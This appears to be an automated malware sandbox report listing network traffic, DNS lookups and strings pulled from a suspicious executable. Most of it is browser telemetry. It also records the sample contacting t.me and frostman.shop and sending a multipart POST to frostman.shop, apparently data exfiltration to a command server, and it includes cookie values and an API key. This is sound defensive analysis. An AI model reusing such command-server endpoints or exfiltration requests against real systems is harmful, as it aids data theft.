                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239317301631_1JS0AMCX251CLJ5OX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381795371_1OWBWRW5WQA079L9Q&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381795372_1FAN52Y1AD18QPYNG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418602_13EDNGC3ZL2WGZFXN&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418601_1XRLHD1YRS9ZZSDWX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734676307694&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=87dea9e2d67e4be995ff056bd35dd4db&activityId=87dea9e2d67e4be995ff056bd35dd4db&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /b?rn=1734676307694&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=015EFEE8056263FB2030EBB304006296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b2?rn=1734676307694&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=015EFEE8056263FB2030EBB304006296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1921a3731edec7d894bcea01734676308; XID=1921a3731edec7d894bcea01734676308
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734676307694&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=87dea9e2d67e4be995ff056bd35dd4db&activityId=87dea9e2d67e4be995ff056bd35dd4db&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=D7BFD8CBD1834510B8B7DB118C7D5586&MUID=015EFEE8056263FB2030EBB304006296 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; SM=T
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: 000003.log6.14.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                  Source: 000003.log6.14.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                  Source: 000003.log6.14.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: t.me
                  Source: global trafficDNS traffic detected: DNS query: frostman.shop
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: apis.google.com
                  Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                  Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                  Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                  Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----M7YMGDTJM7G47Q16P8YUUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                  Source: chromecache_561.7.drString found in binary or memory: http://www.broofa.com
                  Source: V37YCB.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: chromecache_561.7.drString found in binary or memory: https://apis.google.com
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://assets.msn.cn/resolver/
                  Source: 173f49f4-fd6a-4272-bd51-5a99421ced22.tmp.15.drString found in binary or memory: https://assets.msn.com
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://assets.msn.com/resolver/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://bard.google.com/
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://bit.ly/wb-precache
                  Source: ktyihkdfesf.exe, 00000000.00000002.2791704824.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.0000000003944000.00000004.00000020.00020000.00000000.sdmp, 0HDJEU.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                  Source: ktyihkdfesf.exe, 00000000.00000002.2791704824.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.0000000003944000.00000004.00000020.00020000.00000000.sdmp, 0HDJEU.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://browser.events.data.msn.cn/
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://browser.events.data.msn.com/
                  Source: Reporting and NEL.15.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                  Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://c.msn.com/
                  Source: V37YCB.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: offscreendocument_main.js.14.dr, service_worker_bin_prod.js.14.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                  Source: ktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: ktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: manifest.json.14.drString found in binary or memory: https://chrome.google.com/webstore/
                  Source: manifest.json.14.drString found in binary or memory: https://chromewebstore.google.com/
                  Source: 6a82b066-0a0e-4bfa-8ca2-b2a13d05ddcf.tmp.15.dr, 173f49f4-fd6a-4272-bd51-5a99421ced22.tmp.15.drString found in binary or memory: https://clients2.google.com
                  Source: manifest.json0.14.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                  Source: 6a82b066-0a0e-4bfa-8ca2-b2a13d05ddcf.tmp.15.dr, 173f49f4-fd6a-4272-bd51-5a99421ced22.tmp.15.drString found in binary or memory: https://clients2.googleusercontent.com
                  Source: ktyihkdfesf.exe, 00000000.00000002.2791704824.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.0000000003944000.00000004.00000020.00020000.00000000.sdmp, 0HDJEU.0.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                  Source: ktyihkdfesf.exe, 00000000.00000002.2791704824.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.0000000003944000.00000004.00000020.00020000.00000000.sdmp, 0HDJEU.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: Reporting and NEL.15.drString found in binary or memory: https://deff.nelreports.net/api/report
                  Source: 2cc80dabc69f58b6_0.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: Reporting and NEL.15.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                  Source: manifest.json0.14.drString found in binary or memory: https://docs.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive-autopush.corp.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive-preprod.corp.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive-staging.corp.google.com/
                  Source: manifest.json0.14.drString found in binary or memory: https://drive.google.com/
                  Source: ktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: ktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: ktyihkdfesf.exe, 00000000.00000002.2790355832.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, Web Data.14.dr, V37YCB.0.dr, XBS26P.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 173f49f4-fd6a-4272-bd51-5a99421ced22.tmp.15.drString found in binary or memory: https://edgeassetservice.azureedge.net
                  Source: 000003.log6.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
                  Source: 000003.log6.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                  Source: 000003.log6.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                  Source: 000003.log7.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                  Source: HubApps Icons.14.dr, 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                  Source: HubApps Icons.14.dr, 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                  Source: HubApps Icons.14.dr, 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                  Source: HubApps Icons.14.dr, 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
